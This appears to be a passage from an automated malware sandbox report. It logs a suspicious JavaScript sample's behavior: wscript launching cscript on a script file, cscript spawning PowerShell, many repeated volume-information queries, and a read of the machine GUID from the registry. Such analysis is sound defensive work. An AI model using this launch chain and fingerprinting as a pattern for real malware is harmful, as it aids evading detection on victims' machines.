Process information queried: ProcessInformation

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "DEVELO~1.JS"			Jump to behavior
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell			Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cscript.exe "C:\Windows\System32\cscript.exe" "DEVELO~1.JS"
Source: C:\Windows\System32\cscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell			Jump to behavior

Language, Device and Operating System Detection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior